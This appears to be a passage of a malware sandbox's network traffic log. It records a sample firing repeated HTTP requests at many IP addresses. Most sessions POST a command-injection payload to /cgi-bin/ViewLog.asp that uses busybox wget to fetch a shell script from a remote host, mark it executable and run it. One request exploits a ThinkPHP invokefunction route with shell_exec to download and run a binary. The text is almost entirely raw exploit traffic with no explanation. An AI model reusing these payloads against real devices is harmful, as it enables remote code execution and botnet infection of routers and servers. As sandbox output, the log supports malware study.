                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.203892946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:17.347641945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:29.379112005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:54.978144884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        957192.168.2.144616831.136.15.1778080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.117156982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.204020977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:17.347676039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:29.379126072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:54.978158951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        958192.168.2.144212631.136.43.1468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.129545927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.203882933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:17.347659111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:29.379143000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:54.978183985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        959192.168.2.144516288.198.7.19480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.485111952 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:08.696820021 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:08 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        960192.168.2.143945831.136.25.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.564306021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:09.219969034 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:10.499891043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:13.251801968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:18.371599913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:28.611140013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:48.834357977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        961192.168.2.143496894.168.124.988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.578429937 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        962192.168.2.145963431.136.107.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.578530073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:09.251945019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:10.627904892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:13.507956028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:19.139554977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:30.147136927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:52.930183887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        963192.168.2.143730495.49.154.1278080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.586457014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:08.816857100 CET536INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:08 GMT
                                                        Server:
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                        Content-Length: 226
                                                        Connection: close
